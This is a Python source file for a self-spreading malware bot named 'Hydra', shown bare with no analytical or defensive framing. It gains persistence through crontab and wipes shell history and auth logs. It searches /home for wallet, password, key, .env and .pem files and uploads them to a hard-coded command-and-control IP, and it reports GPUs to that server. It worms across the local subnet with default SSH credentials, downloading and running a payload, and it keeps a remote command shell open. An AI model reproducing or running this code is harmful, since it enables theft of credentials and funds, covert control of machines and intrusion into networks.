import socket, subprocess, os, time, random, threading, sys, requests, glob

C2_IP = "80.78.25.235"
UPLOAD_URL = f"http://{C2_IP}:8000/upload"

class Hydra:
    def __init__(self):
        self.uid = str(random.randint(10000,99999))
        self.persist()
        self.wipe_logs()
        threading.Thread(target=self.loot_goblin).start()
        threading.Thread(target=self.check_hardware).start()
        threading.Thread(target=self.worm).start()

    def persist(self):
        try: os.system(f'(crontab -l 2>/dev/null; echo "@reboot python3 {os.path.abspath(__file__)} &") | crontab -')
        except: pass
        
    def wipe_logs(self):
        try: os.system("history -c && echo '' > /var/log/auth.log")
        except: pass

    def loot_goblin(self):
        keywords = ["gift", "card", "wallet", "bitcoin", "password", "secret", "balance", "key"]
        for root, dirs, files in os.walk("/home"):
            for file in files:
                try:
                    path = os.path.join(root, file)
                    if os.path.getsize(path) > 5000000: continue
                    if any(k in file.lower() for k in keywords):
                        self.exfiltrate(path)
                    elif file.endswith((".txt", ".json", ".xml", ".config", ".env", ".pem")):
                        with open(path, "r", errors='ignore') as f:
                            if any(k in f.read().lower() for k in keywords):
                                self.exfiltrate(path)
                except: pass

    def check_hardware(self):
        try:
            gpu = subprocess.getoutput("nvidia-smi --query-gpu=name --format=csv,noheader")
            if "NVIDIA" in gpu:
                requests.post(f"http://{C2_IP}:8000/register_gpu", data={"uid": self.uid, "gpu": gpu})
        except: pass

    def worm(self):
        # SSH Spreading
        try:
            my_ip = subprocess.getoutput("hostname -I").split()[0]
            subnet = ".".join(my_ip.split(".")[:3])
            users = ["root", "admin", "ubuntu", "user"]
            for i in range(1, 255):
                target = f"{subnet}.{i}"
                for u in users:
                    # SSHPass Attack
                    os.system(f"sshpass -p '{u}' ssh -o StrictHostKeyChecking=no {u}@{target} 'wget http://{C2_IP}/agent.py -O /tmp/.a; python3 /tmp/.a &' &")
        except: pass

    def exfiltrate(self, filepath):
        try:
            with open(filepath, "rb") as f:
                requests.post(UPLOAD_URL, files={"file": f}, timeout=10)
        except: pass

    def connect(self):
        while True:
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((C2_IP, 4444))
                s.send(f"HYDRA_{self.uid}_ONLINE\n".encode())
                while True:
                    data = s.recv(4096).decode()
                    if "exec" in data:
                        s.send(subprocess.getoutput(data.split("exec ")[1]).encode())
            except: time.sleep(10)

if __name__ == "__main__":
    bot = Hydra()
    bot.connect()